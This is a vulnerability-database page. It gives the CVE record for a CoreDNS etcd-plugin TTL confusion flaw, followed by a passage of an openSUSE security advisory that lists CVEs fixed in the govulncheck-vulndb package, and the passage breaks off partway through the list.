Action not permitted
Modal body text goes here.
Modal Title
Modal Body
CVE-2025-58063 (GCVE-0-2025-58063)
Vulnerability from cvelistv5
- CWE-681 - Incorrect Conversion between Numeric Types
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2025-58063",
"options": [
{
"Exploitation": "poc"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2025-09-10T14:26:10.971285Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2025-09-10T14:26:13.850Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"references": [
{
"tags": [
"exploit"
],
"url": "https://github.com/coredns/coredns/security/advisories/GHSA-93mf-426m-g6x9"
}
],
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "coredns",
"vendor": "coredns",
"versions": [
{
"status": "affected",
"version": "\u003e= 1.2.0, \u003c 1.12.4"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "CoreDNS is a DNS server that chains plugins. Starting in version 1.2.0 and prior to version 1.12.4, the CoreDNS etcd plugin contains a TTL confusion vulnerability where lease IDs are incorrectly used as TTL values, enabling DNS cache pinning attacks. This effectively creates a DoS condition for DNS resolution of affected services. The `TTL()` function in `plugin/etcd/etcd.go` incorrectly casts etcd lease IDs (64-bit integers) to uint32 and uses them as TTL values. Large lease IDs become very large TTLs when cast to uint32. This enables cache pinning attacks. Version 1.12.4 contains a fix for the issue."
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.1,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:H",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-681",
"description": "CWE-681: Incorrect Conversion between Numeric Types",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2025-09-09T19:27:18.124Z",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"name": "https://github.com/coredns/coredns/security/advisories/GHSA-93mf-426m-g6x9",
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/coredns/coredns/security/advisories/GHSA-93mf-426m-g6x9"
},
{
"name": "https://github.com/coredns/coredns/commit/e1768a5d272e9da649dfb8588595e5c6e4e640bf",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/coredns/coredns/commit/e1768a5d272e9da649dfb8588595e5c6e4e640bf"
}
],
"source": {
"advisory": "GHSA-93mf-426m-g6x9",
"discovery": "UNKNOWN"
},
"title": "CoreDNS: DNS Cache Pinning via etcd Lease ID Confusion"
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2025-58063",
"datePublished": "2025-09-09T19:27:18.124Z",
"dateReserved": "2025-08-22T14:30:32.222Z",
"dateUpdated": "2025-09-10T14:26:13.850Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1",
"vulnerability-lookup:meta": {
"nvd": "{\"cve\":{\"id\":\"CVE-2025-58063\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2025-09-09T20:15:48.057\",\"lastModified\":\"2025-09-11T17:14:25.240\",\"vulnStatus\":\"Awaiting Analysis\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"CoreDNS is a DNS server that chains plugins. Starting in version 1.2.0 and prior to version 1.12.4, the CoreDNS etcd plugin contains a TTL confusion vulnerability where lease IDs are incorrectly used as TTL values, enabling DNS cache pinning attacks. This effectively creates a DoS condition for DNS resolution of affected services. The `TTL()` function in `plugin/etcd/etcd.go` incorrectly casts etcd lease IDs (64-bit integers) to uint32 and uses them as TTL values. Large lease IDs become very large TTLs when cast to uint32. This enables cache pinning attacks. Version 1.12.4 contains a fix for the issue.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:H\",\"baseScore\":7.1,\"baseSeverity\":\"HIGH\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"LOW\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"NONE\",\"integrityImpact\":\"LOW\",\"availabilityImpact\":\"HIGH\"},\"exploitabilityScore\":2.8,\"impactScore\":4.2}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-681\"}]}],\"references\":[{\"url\":\"https://github.com/coredns/coredns/commit/e1768a5d272e9da649dfb8588595e5c6e4e640bf\",\"source\":\"security-advisories@github.com\"},{\"url\":\"https://github.com/coredns/coredns/security/advisories/GHSA-93mf-426m-g6x9\",\"source\":\"security-advisories@github.com\"},{\"url\":\"https://github.com/coredns/coredns/security/advisories/GHSA-93mf-426m-g6x9\",\"source\":\"134c704f-9b21-4f2e-91b3-4a467353bcc0\"}]}}",
"vulnrichment": {
"containers": "{\"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2025-58063\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"no\"}, {\"Technical Impact\": \"partial\"}], \"version\": \"2.0.3\", \"timestamp\": \"2025-09-10T14:26:10.971285Z\"}}}], \"references\": [{\"url\": \"https://github.com/coredns/coredns/security/advisories/GHSA-93mf-426m-g6x9\", \"tags\": [\"exploit\"]}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2025-09-10T14:26:02.976Z\"}}], \"cna\": {\"title\": \"CoreDNS: DNS Cache Pinning via etcd Lease ID Confusion\", \"source\": {\"advisory\": \"GHSA-93mf-426m-g6x9\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV3_1\": {\"scope\": \"UNCHANGED\", \"version\": \"3.1\", \"baseScore\": 7.1, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"HIGH\", \"vectorString\": \"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:H\", \"integrityImpact\": \"LOW\", \"userInteraction\": \"NONE\", \"attackComplexity\": \"LOW\", \"availabilityImpact\": \"HIGH\", \"privilegesRequired\": \"LOW\", \"confidentialityImpact\": \"NONE\"}}], \"affected\": [{\"vendor\": \"coredns\", \"product\": \"coredns\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003e= 1.2.0, \u003c 1.12.4\"}]}], \"references\": [{\"url\": \"https://github.com/coredns/coredns/security/advisories/GHSA-93mf-426m-g6x9\", \"name\": \"https://github.com/coredns/coredns/security/advisories/GHSA-93mf-426m-g6x9\", \"tags\": [\"x_refsource_CONFIRM\"]}, {\"url\": \"https://github.com/coredns/coredns/commit/e1768a5d272e9da649dfb8588595e5c6e4e640bf\", \"name\": \"https://github.com/coredns/coredns/commit/e1768a5d272e9da649dfb8588595e5c6e4e640bf\", \"tags\": [\"x_refsource_MISC\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"CoreDNS is a DNS server that chains plugins. Starting in version 1.2.0 and prior to version 1.12.4, the CoreDNS etcd plugin contains a TTL confusion vulnerability where lease IDs are incorrectly used as TTL values, enabling DNS cache pinning attacks. This effectively creates a DoS condition for DNS resolution of affected services. The `TTL()` function in `plugin/etcd/etcd.go` incorrectly casts etcd lease IDs (64-bit integers) to uint32 and uses them as TTL values. Large lease IDs become very large TTLs when cast to uint32. This enables cache pinning attacks. Version 1.12.4 contains a fix for the issue.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-681\", \"description\": \"CWE-681: Incorrect Conversion between Numeric Types\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2025-09-09T19:27:18.124Z\"}}}",
"cveMetadata": "{\"cveId\": \"CVE-2025-58063\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2025-09-10T14:26:13.850Z\", \"dateReserved\": \"2025-08-22T14:30:32.222Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2025-09-09T19:27:18.124Z\", \"assignerShortName\": \"GitHub_M\"}",
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
}
}
opensuse-su-2025:15564-1
Vulnerability from csaf_opensuse
Notes
{
"document": {
"aggregate_severity": {
"namespace": "https://www.suse.com/support/security/rating/",
"text": "moderate"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright 2024 SUSE LLC. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "govulncheck-vulndb-0.0.20250917T170349-1.1 on GA media",
"title": "Title of the patch"
},
{
"category": "description",
"text": "These are all security issues fixed in the govulncheck-vulndb-0.0.20250917T170349-1.1 package on the GA media of openSUSE Tumbleweed.",
"title": "Description of the patch"
},
{
"category": "details",
"text": "openSUSE-Tumbleweed-2025-15564",
"title": "Patchnames"
},
{
"category": "legal_disclaimer",
"text": "CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).",
"title": "Terms of use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://www.suse.com/support/security/contact/",
"name": "SUSE Product Security Team",
"namespace": "https://www.suse.com/"
},
"references": [
{
"category": "external",
"summary": "SUSE ratings",
"url": "https://www.suse.com/support/security/rating/"
},
{
"category": "self",
"summary": "URL of this CSAF notice",
"url": "https://ftp.suse.com/pub/projects/security/csaf/opensuse-su-2025_15564-1.json"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-4953 page",
"url": "https://www.suse.com/security/cve/CVE-2025-4953/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-54123 page",
"url": "https://www.suse.com/security/cve/CVE-2025-54123/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-54376 page",
"url": "https://www.suse.com/security/cve/CVE-2025-54376/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-58058 page",
"url": "https://www.suse.com/security/cve/CVE-2025-58058/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-58063 page",
"url": "https://www.suse.com/security/cve/CVE-2025-58063/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-58157 page",
"url": "https://www.suse.com/security/cve/CVE-2025-58157/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-58158 page",
"url": "https://www.suse.com/security/cve/CVE-2025-58158/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-58430 page",
"url": "https://www.suse.com/security/cve/CVE-2025-58430/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-58437 page",
"url": "https://www.suse.com/security/cve/CVE-2025-58437/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-58445 page",
"url": "https://www.suse.com/security/cve/CVE-2025-58445/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-58450 page",
"url": "https://www.suse.com/security/cve/CVE-2025-58450/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-59358 page",
"url": "https://www.suse.com/security/cve/CVE-2025-59358/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-59359 page",
"url": "https://www.suse.com/security/cve/CVE-2025-59359/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-59360 page",
"url": "https://www.suse.com/security/cve/CVE-2025-59360/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-59361 page",
"url": "https://www.suse.com/security/cve/CVE-2025-59361/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-7445 page",
"url": "https://www.suse.com/security/cve/CVE-2025-7445/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-8396 page",
"url": "https://www.suse.com/security/cve/CVE-2025-8396/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-9072 page",
"url": "https://www.suse.com/security/cve/CVE-2025-9072/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-9076 page",
"url": "https://www.suse.com/security/cve/CVE-2025-9076/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-9078 page",
"url": "https://www.suse.com/security/cve/CVE-2025-9078/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-9084 page",
"url": "https://www.suse.com/security/cve/CVE-2025-9084/"
}
],
"title": "govulncheck-vulndb-0.0.20250917T170349-1.1 on GA media",
"tracking": {
"current_release_date": "2025-09-18T00:00:00Z",
"generator": {
"date": "2025-09-18T00:00:00Z",
"engine": {
"name": "cve-database.git:bin/generate-csaf.pl",
"version": "1"
}
},
"id": "openSUSE-SU-2025:15564-1",
"initial_release_date": "2025-09-18T00:00:00Z",
"revision_history": [
{
"date": "2025-09-18T00:00:00Z",
"number": "1",
"summary": "Current version"
}
],
"status": "final",
"version": "1"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_version",
"name": "govulncheck-vulndb-0.0.20250917T170349-1.1.aarch64",
"product": {
"name": "govulncheck-vulndb-0.0.20250917T170349-1.1.aarch64",
"product_id": "govulncheck-vulndb-0.0.20250917T170349-1.1.aarch64"
}
}
],
"category": "architecture",
"name": "aarch64"
},
{
"branches": [
{
"category": "product_version",
"name": "govulncheck-vulndb-0.0.20250917T170349-1.1.ppc64le",
"product": {
"name": "govulncheck-vulndb-0.0.20250917T170349-1.1.ppc64le",
"product_id": "govulncheck-vulndb-0.0.20250917T170349-1.1.ppc64le"
}
}
],
"category": "architecture",
"name": "ppc64le"
},
{
"branches": [
{
"category": "product_version",
"name": "govulncheck-vulndb-0.0.20250917T170349-1.1.s390x",
"product": {
"name": "govulncheck-vulndb-0.0.20250917T170349-1.1.s390x",
"product_id": "govulncheck-vulndb-0.0.20250917T170349-1.1.s390x"
}
}
],
"category": "architecture",
"name": "s390x"
},
{
"branches": [
{
"category": "product_version",
"name": "govulncheck-vulndb-0.0.20250917T170349-1.1.x86_64",
"product": {
"name": "govulncheck-vulndb-0.0.20250917T170349-1.1.x86_64",
"product_id": "govulncheck-vulndb-0.0.20250917T170349-1.1.x86_64"
}
}
],
"category": "architecture",
"name": "x86_64"
},
{
"branches": [
{
"category": "product_name",
"name": "openSUSE Tumbleweed",
"product": {
"name": "openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed",
"product_identification_helper": {
"cpe": "cpe:/o:opensuse:tumbleweed"
}
}
}
],
"category": "product_family",
"name": "SUSE Linux Enterprise"
}
],
"category": "vendor",
"name": "SUSE"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "govulncheck-vulndb-0.0.20250917T170349-1.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.aarch64"
},
"product_reference": "govulncheck-vulndb-0.0.20250917T170349-1.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "govulncheck-vulndb-0.0.20250917T170349-1.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.ppc64le"
},
"product_reference": "govulncheck-vulndb-0.0.20250917T170349-1.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "govulncheck-vulndb-0.0.20250917T170349-1.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.s390x"
},
"product_reference": "govulncheck-vulndb-0.0.20250917T170349-1.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "govulncheck-vulndb-0.0.20250917T170349-1.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.x86_64"
},
"product_reference": "govulncheck-vulndb-0.0.20250917T170349-1.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2025-4953",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-4953"
}
],
"notes": [
{
"category": "general",
"text": "A flaw was found in Podman. In a Containerfile or Podman, data written to RUN --mount=type=bind mounts during the podman build is not discarded. This issue can lead to files created within the container appearing in the temporary build context directory on the host, leaving the created files accessible.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-4953",
"url": "https://www.suse.com/security/cve/CVE-2025-4953"
},
{
"category": "external",
"summary": "SUSE Bug 1249835 for CVE-2025-4953",
"url": "https://bugzilla.suse.com/1249835"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.4,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N",
"version": "3.1"
},
"products": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-09-18T00:00:00Z",
"details": "important"
}
],
"title": "CVE-2025-4953"
},
{
"cve": "CVE-2025-54123",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-54123"
}
],
"notes": [
{
"category": "general",
"text": "Hoverfly is an open source API simulation tool. In versions 1.11.3 and prior, the middleware functionality in Hoverfly is vulnerable to command injection vulnerability at `/api/v2/hoverfly/middleware` endpoint due to insufficient validation and sanitization in user input. The vulnerability exists in the middleware management API endpoint `/api/v2/hoverfly/middleware`. This issue is born due to combination of three code level flaws: Insufficient Input Validation in middleware.go line 94-96; Unsafe Command Execution in local_middleware.go line 14-19; and Immediate Execution During Testing in hoverfly_service.go line 173. This allows an attacker to gain remote code execution (RCE) on any system running the vulnerable Hoverfly service. Since the input is directly passed to system commands without proper checks, an attacker can upload a malicious payload or directly execute arbitrary commands (including reverse shells) on the host server with the privileges of the Hoverfly process. Commit 17e60a9bc78826deb4b782dca1c1abd3dbe60d40 in version 1.12.0 disables the set middleware API by default, and subsequent changes to documentation make users aware of the security changes of exposing the set middleware API.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-54123",
"url": "https://www.suse.com/security/cve/CVE-2025-54123"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-09-18T00:00:00Z",
"details": "critical"
}
],
"title": "CVE-2025-54123"
},
{
"cve": "CVE-2025-54376",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-54376"
}
],
"notes": [
{
"category": "general",
"text": "Hoverfly is an open source API simulation tool. In versions 1.11.3 and prior, Hoverfly\u0027s admin WebSocket endpoint /api/v2/ws/logs is not protected by the same authentication middleware that guards the REST admin API. Consequently, an unauthenticated remote attacker can stream real-time application logs (information disclosure) and/or gain insight into internal file paths, request/response bodies, and other potentially sensitive data emitted in logs. Version 1.12.0 contains a fix for the issue.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-54376",
"url": "https://www.suse.com/security/cve/CVE-2025-54376"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-09-18T00:00:00Z",
"details": "not set"
}
],
"title": "CVE-2025-54376"
},
{
"cve": "CVE-2025-58058",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-58058"
}
],
"notes": [
{
"category": "general",
"text": "xz is a pure golang package for reading and writing xz-compressed files. Prior to version 0.5.14, it is possible to put data in front of an LZMA-encoded byte stream without detecting the situation while reading the header. This can lead to increased memory consumption because the current implementation allocates the full decoding buffer directly after reading the header. The LZMA header doesn\u0027t include a magic number or has a checksum to detect such an issue according to the specification. Note that the code recognizes the issue later while reading the stream, but at this time the memory allocation has already been done. This issue has been patched in version 0.5.14.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-58058",
"url": "https://www.suse.com/security/cve/CVE-2025-58058"
},
{
"category": "external",
"summary": "SUSE Bug 1248889 for CVE-2025-58058",
"url": "https://bugzilla.suse.com/1248889"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
"version": "3.1"
},
"products": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-09-18T00:00:00Z",
"details": "moderate"
}
],
"title": "CVE-2025-58058"
},
{
"cve": "CVE-2025-58063",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-58063"
}
],
"notes": [
{
"category": "general",
"text": "CoreDNS is a DNS server that chains plugins. Starting in version 1.2.0 and prior to version 1.12.4, the CoreDNS etcd plugin contains a TTL confusion vulnerability where lease IDs are incorrectly used as TTL values, enabling DNS cache pinning attacks. This effectively creates a DoS condition for DNS resolution of affected services. The `TTL()` function in `plugin/etcd/etcd.go` incorrectly casts etcd lease IDs (64-bit integers) to uint32 and uses them as TTL values. Large lease IDs become very large TTLs when cast to uint32. This enables cache pinning attacks. Version 1.12.4 contains a fix for the issue.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-58063",
"url": "https://www.suse.com/security/cve/CVE-2025-58063"
},
{
"category": "external",
"summary": "SUSE Bug 1249389 for CVE-2025-58063",
"url": "https://bugzilla.suse.com/1249389"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.4,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L",
"version": "3.1"
},
"products": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-09-18T00:00:00Z",
"details": "moderate"
}
],
"title": "CVE-2025-58063"
},
{
"cve": "CVE-2025-58157",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-58157"
}
],
"notes": [
{
"category": "general",
"text": "gnark is a zero-knowledge proof system framework. In version 0.12.0, there is a potential denial of service vulnerability when computing scalar multiplication is using the fake-GLV algorithm. This is because the algorithm didn\u0027t converge quickly enough for some of the inputs. This issue has been patched in version 0.13.0.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-58157",
"url": "https://www.suse.com/security/cve/CVE-2025-58157"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.ppc64le",
